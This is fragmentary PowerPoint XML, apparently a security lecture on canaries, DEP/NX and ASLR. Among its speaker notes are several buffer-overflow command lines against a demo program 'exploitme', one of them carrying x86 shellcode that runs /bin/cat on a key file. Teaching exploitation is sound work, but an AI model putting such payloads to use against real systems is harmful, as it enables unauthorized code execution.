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131.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.tags+xml"/>
  <Override PartName="/ppt/notesSlides/notesSlide1.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notesSlides/notesSlide2.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3.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.notesSlide+xml"/>
  <Override PartName="/ppt/tags/tag137.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.tags+xml"/>
  <Override PartName="/ppt/notesSlides/notesSlide4.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.notesSlide+xml"/>
  <Override PartName="/ppt/tags/tag138.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.tags+xml"/>
  <Override PartName="/ppt/notesSlides/notesSlide5.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notesSlides/notesSlide6.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.notesSlide+xml"/>
  <Override PartName="/ppt/tags/tag141.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.tags+xml"/>
  <Override PartName="/ppt/notesSlides/notesSlide7.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8.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9.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notesSlides/notesSlide10.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11.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notesSlides/notesSlide12.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.notesSlide+xml"/>
  <Override PartName="/ppt/tags/tag156.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.tags+xml"/>
  <Override PartName="/ppt/notesSlides/notesSlide13.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.notesSlide+xml"/>
  <Override PartName="/ppt/tags/tag157.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.tags+xml"/>
  <Override PartName="/ppt/notesSlides/notesSlide14.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.notesSlide+xml"/>
  <Override PartName="/ppt/tags/tag158.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.tags+xml"/>
  <Override PartName="/ppt/notesSlides/notesSlide15.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.notesSlide+xml"/>
  <Override PartName="/ppt/tags/tag159.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.tags+xml"/>
  <Override PartName="/ppt/notesSlides/notesSlide16.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notesSlides/notesSlide17.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notesSlides/notesSlide18.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.notesSlide+xml"/>
  <Override PartName="/ppt/tags/tag165.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.tags+xml"/>
  <Override PartName="/ppt/notesSlides/notesSlide19.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.notesSlide+xml"/>
  <Override PartName="/ppt/tags/tag166.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.tags+xml"/>
  <Override PartName="/ppt/notesSlides/notesSlide20.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.notesSlide+xml"/>
  <Override PartName="/ppt/tags/tag167.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.tags+xml"/>
  <Override PartName="/ppt/notesSlides/notesSlide21.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notesSlides/notesSlide22.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.notesSlide+xml"/>
  <Override PartName="/ppt/tags/tag170.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.tags+xml"/>
  <Override PartName="/ppt/notesSlides/notesSlide23.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.notesSlide+xml"/>
  <Override PartName="/ppt/tags/tag171.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.tags+xml"/>
  <Override PartName="/ppt/notesSlides/notesSlide24.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.notesSlide+xml"/>
  <Override PartName="/ppt/tags/tag172.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.tags+xml"/>
  <Override PartName="/ppt/notesSlides/notesSlide25.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.notesSlide+xml"/>
  <Override PartName="/ppt/tags/tag173.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.tags+xml"/>
  <Override PartName="/ppt/notesSlides/notesSlide26.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.notesSlide+xml"/>
  <Override PartName="/ppt/tags/tag174.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.tags+xml"/>
  <Override PartName="/ppt/notesSlides/notesSlide27.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.notesSlid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notesSlides/notesSlide28.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.notesSlide+xml"/>
  <Override PartName="/ppt/tags/tag19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Lst>
  <p:notesMasterIdLst>
    <p:notesMasterId r:id="rId66"/>
  </p:notesMasterIdLst>
  <p:handoutMasterIdLst>
    <p:handoutMasterId r:id="rId67"/>
  </p:handoutMasterIdLst>
  <p:sldIdLst>
    <p:sldId id="497" r:id="rId3"/>
    <p:sldId id="491" r:id="rId4"/>
    <p:sldId id="414" r:id="rId5"/>
    <p:sldId id="405" r:id="rId6"/>
    <p:sldId id="492" r:id="rId7"/>
    <p:sldId id="406" r:id="rId8"/>
    <p:sldId id="411" r:id="rId9"/>
    <p:sldId id="420" r:id="rId10"/>
    <p:sldId id="421" r:id="rId11"/>
    <p:sldId id="422" r:id="rId12"/>
    <p:sldId id="423" r:id="rId13"/>
    <p:sldId id="424" r:id="rId14"/>
    <p:sldId id="426" r:id="rId15"/>
    <p:sldId id="425" r:id="rId16"/>
    <p:sldId id="408" r:id="rId17"/>
    <p:sldId id="427" r:id="rId18"/>
    <p:sldId id="430" r:id="rId19"/>
    <p:sldId id="434" r:id="rId20"/>
    <p:sldId id="432" r:id="rId21"/>
    <p:sldId id="465" r:id="rId22"/>
    <p:sldId id="499" r:id="rId23"/>
    <p:sldId id="419" r:id="rId24"/>
    <p:sldId id="437" r:id="rId25"/>
    <p:sldId id="438" r:id="rId26"/>
    <p:sldId id="439" r:id="rId27"/>
    <p:sldId id="440" r:id="rId28"/>
    <p:sldId id="441" r:id="rId29"/>
    <p:sldId id="506" r:id="rId30"/>
    <p:sldId id="466" r:id="rId31"/>
    <p:sldId id="443" r:id="rId32"/>
    <p:sldId id="444" r:id="rId33"/>
    <p:sldId id="445" r:id="rId34"/>
    <p:sldId id="467" r:id="rId35"/>
    <p:sldId id="446" r:id="rId36"/>
    <p:sldId id="447" r:id="rId37"/>
    <p:sldId id="448" r:id="rId38"/>
    <p:sldId id="449" r:id="rId39"/>
    <p:sldId id="468" r:id="rId40"/>
    <p:sldId id="450" r:id="rId41"/>
    <p:sldId id="451" r:id="rId42"/>
    <p:sldId id="493" r:id="rId43"/>
    <p:sldId id="495" r:id="rId44"/>
    <p:sldId id="494" r:id="rId45"/>
    <p:sldId id="454" r:id="rId46"/>
    <p:sldId id="469" r:id="rId47"/>
    <p:sldId id="455" r:id="rId48"/>
    <p:sldId id="456" r:id="rId49"/>
    <p:sldId id="457" r:id="rId50"/>
    <p:sldId id="458" r:id="rId51"/>
    <p:sldId id="459" r:id="rId52"/>
    <p:sldId id="460" r:id="rId53"/>
    <p:sldId id="461" r:id="rId54"/>
    <p:sldId id="462" r:id="rId55"/>
    <p:sldId id="470" r:id="rId56"/>
    <p:sldId id="500" r:id="rId57"/>
    <p:sldId id="463" r:id="rId58"/>
    <p:sldId id="501" r:id="rId59"/>
    <p:sldId id="502" r:id="rId60"/>
    <p:sldId id="503" r:id="rId61"/>
    <p:sldId id="504" r:id="rId62"/>
    <p:sldId id="505" r:id="rId63"/>
    <p:sldId id="507" r:id="rId64"/>
    <p:sldId id="387"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AEE1610-0505-CA4A-BCC7-AA58FD6B1707}">
          <p14:sldIdLst>
            <p14:sldId id="497"/>
            <p14:sldId id="491"/>
            <p14:sldId id="414"/>
            <p14:sldId id="405"/>
            <p14:sldId id="492"/>
          </p14:sldIdLst>
        </p14:section>
        <p14:section name="Canary" id="{A82DB36F-D4F7-A74E-82D9-7546BC63C95B}">
          <p14:sldIdLst>
            <p14:sldId id="406"/>
            <p14:sldId id="411"/>
            <p14:sldId id="420"/>
            <p14:sldId id="421"/>
            <p14:sldId id="422"/>
            <p14:sldId id="423"/>
            <p14:sldId id="424"/>
            <p14:sldId id="426"/>
            <p14:sldId id="425"/>
          </p14:sldIdLst>
        </p14:section>
        <p14:section name="DEP-NX / W^X" id="{8717DFD4-5C87-1B40-987F-0D4A1B09032F}">
          <p14:sldIdLst>
            <p14:sldId id="408"/>
            <p14:sldId id="427"/>
            <p14:sldId id="430"/>
            <p14:sldId id="434"/>
            <p14:sldId id="432"/>
            <p14:sldId id="465"/>
            <p14:sldId id="499"/>
          </p14:sldIdLst>
        </p14:section>
        <p14:section name="ASLR" id="{1B6ECEC8-6A4B-5545-9892-7D5A21F94478}">
          <p14:sldIdLst>
            <p14:sldId id="419"/>
            <p14:sldId id="437"/>
            <p14:sldId id="438"/>
            <p14:sldId id="439"/>
            <p14:sldId id="440"/>
            <p14:sldId id="441"/>
            <p14:sldId id="506"/>
            <p14:sldId id="466"/>
            <p14:sldId id="443"/>
            <p14:sldId id="444"/>
            <p14:sldId id="445"/>
            <p14:sldId id="467"/>
            <p14:sldId id="446"/>
            <p14:sldId id="447"/>
            <p14:sldId id="448"/>
            <p14:sldId id="449"/>
            <p14:sldId id="468"/>
            <p14:sldId id="450"/>
            <p14:sldId id="451"/>
            <p14:sldId id="493"/>
            <p14:sldId id="495"/>
            <p14:sldId id="494"/>
            <p14:sldId id="454"/>
            <p14:sldId id="469"/>
            <p14:sldId id="455"/>
            <p14:sldId id="456"/>
            <p14:sldId id="457"/>
            <p14:sldId id="458"/>
            <p14:sldId id="459"/>
            <p14:sldId id="460"/>
            <p14:sldId id="461"/>
            <p14:sldId id="462"/>
            <p14:sldId id="470"/>
            <p14:sldId id="500"/>
            <p14:sldId id="463"/>
            <p14:sldId id="501"/>
            <p14:sldId id="502"/>
            <p14:sldId id="503"/>
            <p14:sldId id="504"/>
            <p14:sldId id="505"/>
            <p14:sldId id="507"/>
          </p14:sldIdLst>
        </p14:section>
        <p14:section name="Probability" id="{48F27A9A-039B-9744-9700-2B170FAD7B1A}">
          <p14:sldIdLst/>
        </p14:section>
        <p14:section name="Conclusion" id="{9261A7F0-4603-054A-9F9B-B1F21EA47009}">
          <p14:sldIdLst>
            <p14:sldId id="387"/>
          </p14:sldIdLst>
        </p14:section>
      </p14:sectionLst>
    </p:ext>
    <p:ext uri="{EFAFB233-063F-42B5-8137-9DF3F51BA10A}">
      <p15:sldGuideLst xmlns:p15="http://schemas.microsoft.com/office/powerpoint/2012/main" xmlns="">
        <p15:guide id="1" orient="horz" pos="2880">
          <p15:clr>
            <a:srgbClr val="A4A3A4"/>
          </p15:clr>
        </p15:guide>
        <p15:guide id="2" orient="horz" pos="1440">
          <p15:clr>
            <a:srgbClr val="A4A3A4"/>
          </p15:clr>
        </p15:guide>
        <p15:guide id="3" pos="3840">
          <p15:clr>
            <a:srgbClr val="A4A3A4"/>
          </p15:clr>
        </p15:guide>
        <p15:guide id="4" pos="14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verick Woo" initials="ma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5842"/>
    <a:srgbClr val="595A5A"/>
    <a:srgbClr val="A32D1E"/>
    <a:srgbClr val="FFFFFF"/>
    <a:srgbClr val="866C49"/>
    <a:srgbClr val="79463D"/>
    <a:srgbClr val="C00000"/>
    <a:srgbClr val="953735"/>
    <a:srgbClr val="F79646"/>
    <a:srgbClr val="B649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2" autoAdjust="0"/>
    <p:restoredTop sz="81839" autoAdjust="0"/>
  </p:normalViewPr>
  <p:slideViewPr>
    <p:cSldViewPr snapToObjects="1">
      <p:cViewPr varScale="1">
        <p:scale>
          <a:sx n="80" d="100"/>
          <a:sy n="80" d="100"/>
        </p:scale>
        <p:origin x="-2320" y="-104"/>
      </p:cViewPr>
      <p:guideLst>
        <p:guide orient="horz" pos="2880"/>
        <p:guide orient="horz" pos="1440"/>
        <p:guide pos="3840"/>
        <p:guide pos="14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0160"/>
    </p:cViewPr>
  </p:sorterViewPr>
  <p:notesViewPr>
    <p:cSldViewPr snapToGrid="0" snapToObjects="1">
      <p:cViewPr varScale="1">
        <p:scale>
          <a:sx n="110" d="100"/>
          <a:sy n="110" d="100"/>
        </p:scale>
        <p:origin x="-4040"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notesMaster" Target="notesMasters/notesMaster1.xml"/><Relationship Id="rId67" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/handoutMaster" Target="handoutMasters/handoutMaster1.xml"/><Relationship Id="rId68" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/printerSettings" Target="printerSettings/printerSettings1.bin"/><Relationship Id="rId69" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/commentAuthors" Target="commentAuthor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tableStyles" Target="tableStyles.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281C90-955A-E944-AB32-466E55900D6A}" type="datetime1">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>11/7/14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2BF8D97-067E-974E-BD5D-FA8C0988A610}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="25950919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9EA11A-7C1A-F544-A99B-661F38A45889}" type="datetime1">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>11/7/14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45A8A3-9FBB-431D-AAA8-BEEA360F5701}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="32917664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1</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3544013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baseline="0" dirty="0" smtClean="0"/>
              <a:t>Windows allowed opting-out at runtime</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{CC45A8A3-9FBB-431D-AAA8-BEEA360F5701}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>19</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2354060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how the address of </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>buf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> has changed.</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23</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2032069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on a modern</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t> system so </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" err="1" smtClean="0"/>
              <a:t>brk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t> (heap) is randomized too</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>address           perms offset  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>dev</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>   </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>inode</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>   pathname</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25</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1359757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a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>init</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t> = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" err="1" smtClean="0"/>
              <a:t>bss</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t>recorded in object file, but not in binary itself</a:t>
            </a:r>
          </a:p>
          <a:p>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26</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="4139568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27</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3136920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for 32-bit processors you get ~16 bits of security.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:fld id="{7167CAFC-2AA3-A84D-A759-81865A8610EF}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr>
                <a:defRPr/>
              </a:pPr>
              <a:t>28</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1740447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baseline="0" dirty="0" err="1" smtClean="0"/>
              <a:t>PICode</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="0" i="0" baseline="0" dirty="0" smtClean="0"/>
              <a:t> =&gt; goes through Global Offset Table</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err="1" smtClean="0"/>
              <a:t>PIExecutable</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" i="0" baseline="0" dirty="0" smtClean="0"/>
              <a:t> is weaker, must be executable, not shared library</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" b="0" i="0" dirty="0" smtClean="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{CC45A8A3-9FBB-431D-AAA8-BEEA360F5701}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>29</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2354060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process is randomized once, e.g. web server</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32</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="599055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a typeface="ＭＳ Ｐゴシック" charset="0"/>
              <a:cs typeface="ＭＳ Ｐゴシック" charset="0"/>
            </a:endParaRPr>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1476A7A-44CF-5A4C-ABB8-AC81BEB24053}" type="slidenum">
              <a:rPr lang="en-US" sz="1200">
                <a:latin typeface="Calibri"/>
              </a:rPr>
              <a:pPr eaLnBrk="1" hangingPunct="1"/>
              <a:t>34</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" sz="1200" dirty="0">
              <a:latin typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3834047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ea typeface="ＭＳ Ｐゴシック" charset="0"/>
                <a:cs typeface="ＭＳ Ｐゴシック" charset="0"/>
              </a:rPr>
              <a:t>./</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Calibri" charset="0"/>
                <a:ea typeface="ＭＳ Ｐゴシック" charset="0"/>
                <a:cs typeface="ＭＳ Ｐゴシック" charset="0"/>
              </a:rPr>
              <a:t>exploitme</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Calibri" charset="0"/>
                <a:ea typeface="ＭＳ Ｐゴシック" charset="0"/>
                <a:cs typeface="ＭＳ Ｐゴシック" charset="0"/>
              </a:rPr>
              <a:t> $(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Calibri" charset="0"/>
                <a:ea typeface="ＭＳ Ｐゴシック" charset="0"/>
                <a:cs typeface="ＭＳ Ｐゴシック" charset="0"/>
              </a:rPr>
              <a:t>perl</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Calibri" charset="0"/>
                <a:ea typeface="ＭＳ Ｐゴシック" charset="0"/>
                <a:cs typeface="ＭＳ Ｐゴシック" charset="0"/>
              </a:rPr>
              <a:t> -e 'print "a"x12 . "\x04\x85\x04\x08"')</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:latin typeface="Calibri" charset="0"/>
              <a:ea typeface="ＭＳ Ｐゴシック" charset="0"/>
              <a:cs typeface="ＭＳ Ｐゴシック" charset="0"/>
            </a:endParaRP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293F16D-7DC7-0D43-A9CA-09F00DCDDCC9}" type="slidenum">
              <a:rPr lang="en-US" sz="1200">
                <a:latin typeface="Calibri"/>
              </a:rPr>
              <a:pPr eaLnBrk="1" hangingPunct="1"/>
              <a:t>35</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" sz="1200" dirty="0">
              <a:latin typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="127441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touch on heap-based </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t>attacks</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3</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3853127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a typeface="ＭＳ Ｐゴシック" charset="0"/>
              <a:cs typeface="ＭＳ Ｐゴシック" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="317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01DDD87-64C2-B149-A59C-5124D2E5CC8D}" type="slidenum">
              <a:rPr lang="en-US" sz="1200">
                <a:latin typeface="Calibri"/>
              </a:rPr>
              <a:pPr eaLnBrk="1" hangingPunct="1"/>
              <a:t>36</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" sz="1200" dirty="0">
              <a:latin typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2988153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37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ea typeface="ＭＳ Ｐゴシック" charset="0"/>
                <a:cs typeface="ＭＳ Ｐゴシック" charset="0"/>
              </a:rPr>
              <a:t>./exploitme $(perl -e 'print "a"x8 . "\x04\x85\x04\x08"') abc</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3379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6FBEFBF-F13D-824E-94DB-F18D6C3986EC}" type="slidenum">
              <a:rPr lang="en-US" sz="1200">
                <a:latin typeface="Calibri"/>
              </a:rPr>
              <a:pPr eaLnBrk="1" hangingPunct="1"/>
              <a:t>37</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" sz="1200" dirty="0">
              <a:latin typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="32797718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58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a typeface="ＭＳ Ｐゴシック" charset="0"/>
              <a:cs typeface="ＭＳ Ｐゴシック" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="358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5189470-E3CB-0046-9A4D-45B40B6E7F33}" type="slidenum">
              <a:rPr lang="en-US" sz="1200">
                <a:latin typeface="Calibri"/>
              </a:rPr>
              <a:pPr eaLnBrk="1" hangingPunct="1"/>
              <a:t>39</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" sz="1200" dirty="0">
              <a:latin typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1505462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ea typeface="ＭＳ Ｐゴシック" charset="0"/>
                <a:cs typeface="ＭＳ Ｐゴシック" charset="0"/>
              </a:rPr>
              <a:t>./exploitme $(perl -e 'print "\x31\xc0\x50\x68\x2f\x63\x61\x74\x68\x2f\x62\x69\x6e\x89\xe3\x50\x68\x6b\x6b\x65\x79\x89\xe2\x42\x50\x52\x53\x89\xe1\x31\xd2\xb0\x0b\xcd\x80" . "\x90"x33 . "\xcf\x83\x04\x08"')</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="378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E0DC711-2747-C44B-9958-0612200EF6C6}" type="slidenum">
              <a:rPr lang="en-US" sz="1200">
                <a:latin typeface="Calibri"/>
              </a:rPr>
              <a:pPr eaLnBrk="1" hangingPunct="1"/>
              <a:t>40</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" sz="1200" dirty="0">
              <a:latin typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="337995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r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:latin typeface="Calibri" charset="0"/>
                <a:ea typeface="ＭＳ Ｐゴシック" charset="0"/>
                <a:cs typeface="ＭＳ Ｐゴシック" charset="0"/>
              </a:rPr>
              <a:t>This</a:t>
            </a:r>
            <a:r>
